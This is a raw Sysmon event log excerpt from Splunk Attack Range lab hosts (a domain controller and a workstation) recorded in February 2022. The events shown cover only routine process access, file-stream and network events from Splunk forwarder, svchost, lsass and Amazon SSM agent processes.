2.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:03.536{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:03.536{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:03.536{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1A43-6216-7F07-000000003802}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:03.536{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A43-6216-7F07-000000003802}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:03.538{C8EA50B7-1A43-6216-7F07-000000003802}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:03.521{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=934CE8386595D731B8880D3B5CF98F48,SHA256=BA2E8E660D79476E890DAD5349C27BE2A343441AB7F2A7DB573AB9289FEBF4BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223362Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:01.719{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51780-false10.0.1.12-8000- 23542300x8000000000000000223361Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:04.886{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5D47C9E8BBCDC2F7573541BDFE59BA2,SHA256=E4027A8E54DDCB61DB447A362623DDF8B8C806615847E9A6B80772765C2E07FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:04.536{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3F0E637F6083D54126D69585E9B98B0,SHA256=1691DAA773EA872A69D538EF4DDF61FBA2FF35ACC35C92D4DEB5ED435E8405B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223363Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:05.886{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56CA699431BA9F688EBD163F27C6D318,SHA256=5CB17FFDB34D0A8535819037072E940169A3714C9D9EEA6AD1B1A4A44589DE1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:05.558{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1B3E07A9C0D68A6E79C4639DDEBB73F,SHA256=95999F1DF326989F11FC2A103604E8404ACD73331F1A8A227116FF5EFE4061A2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:03.614{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49621-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000299481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:03.614{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49621-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000299480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:03.513{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49620-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223364Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:06.901{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CD922C91E69DFB3CE6C503EA736294C,SHA256=4CAF9E2F23634EC82E7D684E9F1405069BC472CC6C150E3ECF13A18D6D24951F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:06.576{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE15212509D38611907745BF02386721,SHA256=22B4547DE8DE851AA175DCFE38A791BF784778B58CCF23E4B661B29DAA90F1E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223365Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:07.917{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=397087BE3F4604DF283C55D3610F7CA4,SHA256=2B53FE880A9AA9D169DE57A3BA6FC13B64ED355C6FD6250A1CE6622622B94CB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:07.606{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0F2B7812F013832FF332AF8450DDCCB,SHA256=FEAF355C93BC6965F05EAD9D55AA5ACD7656959670FF182459FA72D372996BF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223366Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:08.917{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6F30F44DCEAE5BDD22E9FABDEE42E2E,SHA256=0787C965D884E4A3BD8F64E57361AD16521D6898000777DE4CBB0C1560C2B956,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:08.621{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C2D8A47EE85680F7A35FC029FD26B4A,SHA256=45ADC040A02959C3F97BEB5820A3BB449315B4D20B6650E267651CEDA1AADA74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223367Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:09.932{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75FB30B5A7682090ED1283FAD0144CE0,SHA256=C4A8C5457F39251A9311A62C48A4A508CE8E0E3754648EB4BCB6E5ABEE357C89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:09.622{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5BBC23E53AED1EFF67D8B5678BDDBE5,SHA256=AA6C79C390604CEF5FB7C91A55FB3CC42FE2132A3CF51418EE9EBC22D04F49BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223369Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:10.948{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40FA38D64EC6E448146C7ABB45C03056,SHA256=701F06518E71A101B1DB98242E177763C24B7C943164D505AE9A15F25833E224,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:10.623{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73FD8FC59E8F3C04A04397284107B1F3,SHA256=4D9C41BA6EF3A143456B06F5A04CBDBEA913A298C721FC105AF6E8F0D78DAE98,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223368Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:07.577{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51781-false10.0.1.12-8000- 354300x8000000000000000299488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:08.651{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49622-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223370Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:11.995{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66700BC452253EF830BC39D8B5018CAD,SHA256=D43060C116E1FBB40D1FBEAEF09C67EF83E3952F5BB91F49BB2F81266CAA5DDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:11.638{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3823EBFDE68086D40FBEDF30443B5D3,SHA256=A4600D5C5EAD7011124E4BF2A2E287326A77A99F221696E595D9FA6AABC505A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223371Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:12.995{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39916A11594F1F6D09EEADD4FA616983,SHA256=CCA89E6B0EC89162FCAE76CAEAC147626959B9E3126E92A0F3C411FCD42C459C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:12.659{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67FA397D6CD09300CF94CC8D9FCE438F,SHA256=6BB7BD4BFEF952D137F6E0ABE23FD05CACAA7933119AEC3120CF7232092DCD07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:12.361{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-170MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:13.675{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6978099FE8F337D32F10FB87CDC3F9E3,SHA256=9D6D078D2188AA8F584B6E673C8EF8558A2E3257406CF49B45E3C7443A2D1264,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:13.379{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-171MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:14.689{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97C7D41285B8A9236F451D02EC69CC5F,SHA256=5EC3CA9A189732C2C7D403F84D68BEA5142C69E834C4E96BDAD328B980199B82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223372Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:14.230{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAB3FDA1BE2040E926FEBD9D31007E41,SHA256=69D4555D6B847B36B1216D91A68FE9A0990E34C38151A48671BCE742FA5AE57D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:15.736{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9391607F87EDEAF806C14D788031145E,SHA256=A36732AC18D88C486A000E590BC85C813DD2260B830666E2D4275C194F04E16A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223374Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:15.277{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0016E7A9A29F37F8F6A365D58954D774,SHA256=4D077F5FB969F1CA3378EAC4EC6B03313F30A9CBED74D6FC77326365784C9C6E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223373Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:12.593{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51782-false10.0.1.12-8000- 354300x8000000000000000299498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:14.597{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49623-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:16.773{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEE20BF68D1613178F9E9DE6DF66967D,SHA256=8ED33B94CC0B92AB394289DD79BEE65EBC36E70F59374006836F68384E3A9CD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223375Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:16.309{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E115B6416FC65096F63A564A4962EAC0,SHA256=5E4F2BCF17B1A9D1A7279BF151E00C386707C611719A0E53978C08926F735CF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223376Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:17.450{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0DDE95E2323E7DFF373C4A5A0C6E508,SHA256=1470CB4F51F129C8B58211891262719D7B1D05B1AA49375F7B81A0A121984039,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:17.788{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9ECE60B01A26881809CD19ADD931965,SHA256=456B37B46862AD3C2A39E625E273D81038F8D7549A21B6A7F858E60357C741A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223377Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:18.498{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03F74488B22C15AD1DB43F3676482FF5,SHA256=F5F5163650E7E8C2E230B5D116D437260AF27638AF47A1A027BED9B026923F4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:18.803{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A35FAA3F13E1BE561A7B307295A69DFF,SHA256=C57765FA0062DC22774BE7F3BAB96141984869160A17268E8D7F5DBDAB95E565,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223379Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:28:19.733{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E6F5DB016014876033C620ABFC64DC5,SHA256=5A400D2ADB17B967B516239C2EF39A24547D64AF03AC2203596D9DD6643C0B7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:28:19.834{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 